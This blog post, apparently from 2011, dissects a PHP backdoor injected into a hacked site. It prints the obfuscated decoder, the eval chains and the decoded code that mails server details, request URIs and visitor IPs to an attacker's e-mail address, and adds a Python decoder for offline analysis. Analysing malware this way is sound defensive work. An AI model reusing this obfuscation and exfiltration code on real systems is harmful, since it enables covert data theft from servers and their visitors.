
Wednesday, 26 October 2011

Dissecting Sample No - 2

a) Your system has been hacked and some code has been injected remotely. The following function is among that injected code.
It is executed automatically on every request of the page into which it is hooked, with a default string supplied as its argument.
The string is encoded with a simple algorithm that decodes easily; the encoding is probably meant to hide the content (his e-mail address, etc.)
from inexperienced eyes.

function d($s, $k=''){
    if($k==''){
        // no key: the string is plain hex, two characters per byte
        // (the "<strlen($s)" loop condition was lost to HTML stripping and is reconstructed here)
        for($i=0;$i<strlen($s);){
            $d.=chr(hexdec(substr($s, $i, 2)));
            $i=(float)($i)+2;
        }
        return $d;
    }else{
        // the hex literal decodes to 'base64_decode', and base64 'Z3ppbmZsYXRl' is 'gzinflate':
        // the payload is base64, then raw DEFLATE, then a byte-wise key subtraction
        $r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));
        for($i=0;$i<strlen($s);$i++){
            // note the -1 in the key index: on a wrap it reads the last key character
            $c=substr($s, $i, 1);$kc=substr($k, ($i%strlen($k))-1, 1);$c=chr(ord($c)-ord($kc));$r.=$c;
        }
        return $r;
    }
}
eval(d("VZL7TuJAGMUfbfcV1HUJoMnakVvqLUqhpVNoYVpmaBvRXul0hqq0XOpGH3HR7CbuvyfnJL/zfYdGtTov8jSv/VzXj3p \
Gr3K8ub4STo7HqFKl+Span1aKXwd3unRY2d5cs0eeh/WT94im1Wq1dvleXS55eHh98EODRvmAZcFrwCtnqZWONRPslsnnQGS2mf \
AZacvhdFvgZ+ohhhtmKsnB0iAou6PojbzMqbo1TJiPty2oSZNXx3H5PQAbW8H5pORpcN5fuu6zqKeiMaBcHEqktInN4yWg9pmjE \
IGqVt9JNGul97hJ50TnhqmtogHZGLSzgbzF7gVdtrirYr5bmvJkitUL1Rb0qQrATpNvTIRVYtqabwhQtjBRMSARxirUmqCj3wqa \
qrRZQJx4bN5tfU2KKW4lHsGrobWLocK2UAGLB4AFm7RbQ8lAaCqMyYDE2EJ9i+67lXLqzW7Lf75H5eItUoymTSYs5MkXvvL/LAe \
f2aAxpT7vinoXxZZAMGEuImWgEtWc3J8lYwugF3vP0ptkLHCNTJeExYCXO8Q0E1nZQoNakgAceBnZOaTNVKXXhrK5nmPAidKW45 \
myCBrDD42mpJv4DeMp5G+FiW8/tOekv1ujD+Ze8dlX512WKCHzS3jRnxSpk6mbAO/5Uqf0zoEIJb2Ag6D0XbTWmRiTV8BH9O/fe \
ItOFbTxzssepGI6AyMZP7myw/IMyeYMyzcDC4ym+9uvddqk+hboAdGefClefNnaBu53EBL1ZSR32YLomSZ1Mzcz1r6Zdo5vjqLf \
j7zmeUXSaYZBFGRhfFrhqziq1y6/f4t3WX75Bw==", 1235327122));
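As an added analyst-side example (not part of the original post, and not the attacker's code): a Python reimplementation of both branches of d(), so a payload built this way can be decoded offline without ever reaching eval(). The plaintext and the round-trip payload below are constructed; the key string and the two hidden function-name literals are the ones from the sample above.

```python
import base64
import zlib

# Hex / base64 literals the sample hides its function names in; values taken from the page.
HEX_BASE64_DECODE = "6261736536345f6465636f6465"
B64_GZINFLATE = "Z3ppbmZsYXRl"


def d_hex(s: str) -> str:
    """The no-key branch of d(): plain hex, two characters per byte."""
    return bytes.fromhex(s).decode("latin-1")


def hidden_function_names() -> tuple:
    """What the two literals in the keyed branch resolve to at run time."""
    return d_hex(HEX_BASE64_DECODE), base64.b64decode(B64_GZINFLATE).decode("ascii")


def d_keyed(s: str, k: str) -> bytes:
    """The keyed branch of d(): base64 -> raw DEFLATE (gzinflate) -> subtract a key byte.

    PHP's substr($k, ($i % strlen($k)) - 1, 1) starts at index -1 on a wrap, i.e. the
    last key character; Python's negative index does the same, so the quirk is kept.
    PHP chr() masks its argument to 0..255, hence the % 256.
    """
    data = zlib.decompress(base64.b64decode(s), -15)  # -15: raw DEFLATE, no zlib header
    return bytes((b - ord(k[(i % len(k)) - 1])) % 256 for i, b in enumerate(data))


def encode_keyed(plain: bytes, k: str) -> str:
    """Inverse of d_keyed(); only used here to build a constructed test payload."""
    mixed = bytes((b + ord(k[(i % len(k)) - 1])) % 256 for i, b in enumerate(plain))
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(mixed) + comp.flush()).decode("ascii")


# Constructed stand-in for the real payload (the page's blob is not reproduced here).
SAMPLE_PLAIN = b'if((isset($v) AND $v==0)){ die(""); }\n$lmge = "...";\neval(base64_decode($lmge));\n'
# The sample passes the integer 1235327122; PHP strlen()/substr() treat it as this string.
SAMPLE_KEY = "1235327122"


def decode_demo() -> bytes:
    """Round-trip the constructed payload through the Python d() instead of PHP eval()."""
    return d_keyed(encode_keyed(SAMPLE_PLAIN, SAMPLE_KEY), SAMPLE_KEY)


if __name__ == "__main__":
    print(hidden_function_names())
    print(decode_demo().decode("latin-1"))
```

To decode a real sample, paste its base64 blob and key into d_keyed() and inspect the returned bytes rather than executing them.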


----------------------------------------------------------------------

b) The above function, named "d", is called by eval to decode the provided string, and eval then
executes the resulting output, shown below. That output contains another string value,
$lmge, which in this case is base64 encoded. Follow the next steps.


if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){
die(\'\');
}
$lmge = \"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWW1GdUxtUmhaMlV3TjBCbmJXRnBiQzVqYjIwPSIpOw0KKCRzY \
WZlX21vZGUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRU \
UF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJSRU1 \
PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWy \
dIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieXBhc3NlclxuS \
VA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb2xAIi4k \
X1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7\";

eval(base64_decode($lmge));
exit;
----------------------------------------------------------------------

c) Now, this time the above base64-encoded string named "$lmge" in turn produces the following code,
which auto-sends an e-mail.

$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20=");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">"; // the "<tool@...>" part was stripped by the HTML extraction; restored from the base64 above
mail( $creator, $subj, $msg, $from);

But where the values of $v, $t, $safez, $bypasser and $writ come from is not clear; probably some other
missing functions provide them. That is not important: what it does as a whole is very clear, and not
respectable at all.

------------------------------------------------------------------------
d) Finally an e-mail is sent to the value of the variable $creator, which is again base64 encoded and
decodes to ban.dage07@gmail.com

What is being sent from your system to ban.dage07@gmail.com is:
1- The IP number of your server.
2- The domain name (if hosting multiple domains).
3- The URI that was requested to access this page. If your client/customer sent you any data via the
GET method, all of it is captured. So this hacker is spying as well.
4- The version of your system.
5- The IP number of the visitor who is currently accessing this page.
6- The host name of the visitor who is currently accessing this page.
7- And finally some more critical information: whether PHP safe mode is ON or OFF.
